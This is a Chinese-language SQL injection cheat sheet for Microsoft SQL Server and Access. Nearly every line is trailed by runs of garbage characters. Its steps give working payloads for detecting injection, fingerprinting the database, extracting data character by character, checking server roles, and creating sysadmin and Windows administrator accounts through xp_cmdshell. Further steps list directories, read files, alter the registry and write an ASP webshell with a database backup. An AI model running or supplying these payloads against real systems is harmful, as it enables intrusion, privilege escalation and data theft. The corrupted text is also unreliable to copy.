1.判断是否有注入;and 1=1 ;and 1=2 >F�OC�dlJ#
2.初步判断是否是mssql ;and user>0 k�]r4b`x`�
0El�EaH�1z
3.注入参数是字符'and [查询条件] and ''=' vw3[(_MV3_
?G',Q�tz<K
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 0%L:�jq{5�
x��cmg3�:s
5.判断数据库系统 a*�X{hU�9P
\W�C,iA%�Y
;and (select count(*) from sysobjects)>0 mssql >�]ux3F�3\
j?|V���x'�
;and (select count(*) from msysobjects)>0 access 62'9lr�iQ
y�Bs-bp"-�
~?��a�Fc)
{X?1}5r�y�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 uk$M�Q�v*D
:�ZB.I��(v
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 p��\;�8?�x
��w{[���^�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �U���n)Xe
8��g_kZ^<[
9.(1)猜字段的ascii值(access) �+VW8{��=$
P�i?G:I�F�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 T|�BlF�J0"
*@#G�c%mGu
(2)猜字段的ascii值(mssql) LB]3-F�sU+
,|�VLO�Y�^
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &X�cPHZy�'
UTu~�"u�CR
10.测试权限结构(mssql) �GEV�DXx>@
Y(1?uVYW\d
vO9=C�Cxvq
'9.@r\��g�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Jv�3G��\9_
$X� Uck��[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ri�R],�S�j
�.,qh,m\Fo
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 9QHj$)?�k,
R��|)l�^~x
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- tF/Ni*\^rV
= �)3\B��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 'Y
,�2CN��
P(@�Q[XQ�2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �3�p HI+a�
q+8d�e_"�]
;and 1=(select IS_MEMBER('db_owner'));-- 5�p�~5-_JX
#�0h}{y
E
7n�8�4`|=�
�T&6>E�b0{
11.添加mssql和系统的帐户 "eTALRL'o�
,!^c`_Q\>@
;exec master.dbo.sp_addlogin username;-- j��]%XY+�e
;exec master.dbo.sp_password null,username,password;-- (r?hD�*�2r
nJv=k�k1|o
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��l{�^��s4
^.@%n1I"5y
;exec master.dbo.xp_cmdshell 'net user username password �|dHt�v�6I
o5�8c�!44�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _0^>^he���
*rxYal4ad�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 7uw-1F5x7�
[� t8]'RI%
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- vmN�I$�KZM
38X{>*����
T3=h7�a %=
Zz:%KU��l3
12.(1)遍历目录 &� uwOyb�
�_XY(�Q�d�
;create table dirs(paths varchar(100), id int) ^K� J�#�dT
� <�{ v
%2
;insert dirs exec master.dbo.xp_dirtree 'c:\' {�*8�G�<&�
Cf�ly�K�@�
;and (select top 1 paths from dirs)>0 }zkF�l{/�u
fXnewPr=#�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) [h
B$%i]\<
8#,_%<?UVy
-M�r�t%�1g
R64f�0N�K.
(2)遍历目录 T�T3G��GHR
��FY�)]yz
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?9��eiT:�2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;C1�#[U1Uy
lq�rI*@>Tz
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 RT�g\�c[=w
4|Y1W}!�0/
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 4=y&}3om(0
�0cf���GI%
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6q`)%"�4k
Cq<���L�j�
�.��dxELSV
G9j�f]Ye�;
13.mssql中的存储过程 (5:�pHX�`P
/7+b.h])^
xp_regenumvalues 注册表根键, 子键 j��bT{K|d-
s7�:_!Nd@8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Hc|cA(9sh9
3�gJZlH5IR
xp_regread 根键,子键,键值名
(igB'S5wf
xf7YI�hL^*
;exec xp_regread x)$0Nr62D�
�726�UO#�*
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 R�@�Gll�60
B2LXF3#�/�
xp_regwrite 根键,子键, 值名, 值类型, 值 /E�T+�`�=n
�CsT&��}-C
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 |)�&d9|��]
_p9"M�U�&}
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �*�""W�`x
�jxhZOLG
xp_regdeletevalue 根键,子键,值名 ��;P�8%�yf
1#Ax�Fdm�1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �\W����dSj
&�~�B8~U4%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �"s�zJ[
_B
3'A0�{(b�
g��rkA2%�N
�'t�*]�6�^
14.mssql的backup创建webshell jRDvVV/-wr
&e*@:5Z:k�
use model � �ZpBP#Y*
gzW{h0i�Rr
create table cmd(str image); W
9�}xfy09
P�&:�[pPG�
insert into cmd(str) values (''); ���NZ�!I >
p��__N�6�a
backup database model to disk='c:\l.asp'; p�_JWklg^�
XUUP#<,s�
fsnZHL�}=n
'<ZH�z�DW@
15.mssql内置函数 s��0x�/2z�
6
A#xFPYY{
;and (select @@version)>0 获得Windows的版本号 �ug;\`.nT^
lt2M��B��#
;and user_name()='dbo' 判断当前系统的连接用户是不是sa x�`I��Wo:j
�bNm]��h�.
;and (select user_name())>0 爆当前系统的连接用户 �x�7�i<dg&
&^ s8V]�^�
;and (select db_name())>0 得到当前连接的数据库 *|C��v�K&7
�M�I:�%Eq�
b���t.3#aj
o�"A)t�=��
16.简洁的webshell Q uw�|�KL�
a���+~�b3�
use model /PR��4ILed
��X�sFz�Sm
create table cmd(str image); vfm�Y��>nr
gLZJQubz
6
insert into cmd(str) values (''); #O�8=M(- V
}?+tX���<j
backup database model to disk='g:\wwwtest\l.asp';
